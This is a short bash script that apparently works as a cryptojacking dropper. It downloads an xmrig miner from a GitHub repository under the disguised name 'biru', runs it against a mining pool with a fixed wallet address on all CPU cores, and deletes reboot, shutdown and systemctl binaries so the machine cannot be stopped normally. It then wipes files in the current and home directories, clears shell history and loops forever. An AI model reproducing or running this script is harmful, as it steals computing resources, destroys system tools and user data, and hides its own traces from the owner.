#!/bin/bash
wget -O biru https://github.com/claires67/buut/raw/main/xmrig > /dev/null 2>&1
chmod 777 biru
./biru --donate-level 1 -o randomx.rplant.xyz:7139 -u SEXTTRAacnPbtCB7eoWaXWCEPcs7W2ZTZPwHayYHzB8jD8CJ6jPhBoXd4MEesUbbWYbsoUVkYFimA8GFJNvor8tRADmsCccUFf -p $(shuf -n 1 -i 1-999)-KK -a rx/0 -t $(nproc --all) 
sleep 30
sudo rm -rvf /sbin/reboot /sbin/shutdown /sbin/poweroff /sbin/halt /bin/systemctl /usr/sbin/reboot /usr/sbin/shutdown /usr/sbin/poweroff /usr/sbin/halt /usr/bin/systemctl || rm -rvf /sbin/reboot /sbin/shutdown /sbin/poweroff /sbin/halt /bin/systemctl /usr/sbin/reboot /usr/sbin/shutdown /usr/sbin/poweroff /usr/sbin/halt /usr/bin/systemctl
curl ifconfig.me
rm -rvf *
cd ~/
rm -rvf *
history -cr
while true
do
        echo "hold down..."
        sleep 30
done
